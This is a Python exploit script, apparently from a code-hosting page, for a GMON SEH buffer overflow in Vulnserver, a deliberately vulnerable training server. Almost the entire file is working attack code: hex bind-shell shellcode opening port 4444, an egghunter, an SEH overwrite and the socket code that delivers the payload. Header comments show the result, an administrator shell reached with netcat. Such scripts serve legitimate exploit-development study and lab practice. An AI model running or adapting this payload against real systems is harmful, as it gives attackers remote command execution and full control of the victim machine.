/
Vulnserver.exe-SEH-Exploit.py
69 lines (63 loc) · 3.05 KB
/
Vulnserver.exe-SEH-Exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
#!/usr/bin/python
# Vulnserver.exe GMON SEH Overflow Exploit by 1N3@CrowdShield
# https://crowdshield.com
#
# nc -v 192.168.101.171 4444
# 192.168.101.171: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.101.171] 4444 (?) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\Documents and Settings\Administrator\Desktop\vulnserver>whoami
# whoami
# win2k3221\administrator
#
# C:\Documents and Settings\Administrator\Desktop\vulnserver>
import socket, time
host = "10.0.0.38"
port = 9999
# BIND SHELL PORT 4444/TCP + EGG
bind_shell = "T00WT00W"
bind_shell += "\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13"
bind_shell += "\x9e\x13\xb0\x4f\x83\xeb\xfc\xe2\xf4\x62\xfb\x32\x4f"
bind_shell += "\x9e\x13\xd0\xc6\x7b\x22\x70\x2b\x15\x43\x80\xc4\xcc"
bind_shell += "\x1f\x3b\x1d\x8a\x98\xc2\x67\x91\xa4\xfa\x69\xaf\xec"
bind_shell += "\x1c\x73\xff\x6f\xb2\x63\xbe\xd2\x7f\x42\x9f\xd4\x52"
bind_shell += "\xbd\xcc\x44\x3b\x1d\x8e\x98\xfa\x73\x15\x5f\xa1\x37"
bind_shell += "\x7d\x5b\xb1\x9e\xcf\x98\xe9\x6f\x9f\xc0\x3b\x06\x86"
bind_shell += "\xf0\x8a\x06\x15\x27\x3b\x4e\x48\x22\x4f\xe3\x5f\xdc"
bind_shell += "\xbd\x4e\x59\x2b\x50\x3a\x68\x10\xcd\xb7\xa5\x6e\x94"
bind_shell += "\x3a\x7a\x4b\x3b\x17\xba\x12\x63\x29\x15\x1f\xfb\xc4"
bind_shell += "\xc6\x0f\xb1\x9c\x15\x17\x3b\x4e\x4e\x9a\xf4\x6b\xba"
bind_shell += "\x48\xeb\x2e\xc7\x49\xe1\xb0\x7e\x4c\xef\x15\x15\x01"
bind_shell += "\x5b\xc2\xc3\x7b\x83\x7d\x9e\x13\xd8\x38\xed\x21\xef"
bind_shell += "\x1b\xf6\x5f\xc7\x69\x99\xec\x65\xf7\x0e\x12\xb0\x4f"
bind_shell += "\xb7\xd7\xe4\x1f\xf6\x3a\x30\x24\x9e\xec\x65\x25\x96"
bind_shell += "\x4a\xe0\xad\x63\x53\xe0\x0f\xce\x7b\x5a\x40\x41\xf3"
bind_shell += "\x4f\x9a\x09\x7b\xb2\x4f\x8f\x4f\x39\xa9\xf4\x03\xe6"
bind_shell += "\x18\xf6\xd1\x6b\x78\xf9\xec\x65\x18\xf6\xa4\x59\x77"
bind_shell += "\x61\xec\x65\x18\xf6\x67\x5c\x74\x7f\xec\x65\x18\x09"
bind_shell += "\x7b\xc5\x21\xd3\x72\x4f\x9a\xf6\x70\xdd\x2b\x9e\x9a"
bind_shell += "\x53\x18\xc9\x44\x81\xb9\xf4\x01\xe9\x19\x7c\xee\xd6"
bind_shell += "\x88\xda\x37\x8c\x4e\x9f\x9e\xf4\x6b\x8e\xd5\xb0\x0b"
bind_shell += "\xca\x43\xe6\x19\xc8\x55\xe6\x01\xc8\x45\xe3\x19\xf6"
bind_shell += "\x6a\x7c\x70\x18\xec\x65\xc6\x7e\x5d\xe6\x09\x61\x23"
bind_shell += "\xd8\x47\x19\x0e\xd0\xb0\x4b\xa8\x40\xfa\x3c\x45\xd8"
bind_shell += "\xe9\x0b\xae\x2d\xb0\x4b\x2f\xb6\x33\x94\x93\x4b\xaf"
bind_shell += "\xeb\x16\x0b\x08\x8d\x61\xdf\x25\x9e\x40\x4f\x9a"
egghunter = "\x90" * 10 + "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + "\x90" * 3
shrt_jmp = "\xEB\xD0\x90\x90"
eip = "\xB4\x10\x50\x62"
buffer = "GMON /.:/" + "\x90" * 3000 + bind_shell + "\x90" * 88 + egghunter + shrt_jmp + eip + "C" * 2000
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host,port))
print sock.recv(1024)
time.sleep(1)
print "Sending buffer: " + host + ":" + str(port) + " " + buffer
try:
sock.sendto(buffer, (host, port))
sock.settimeout(10)
print sock.recv(1024)
except:
print "socket connection failed!"
print "Done!"